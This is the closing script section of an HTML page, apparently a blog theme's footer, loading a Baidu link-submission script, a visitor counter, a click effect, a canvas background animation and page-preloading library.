        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
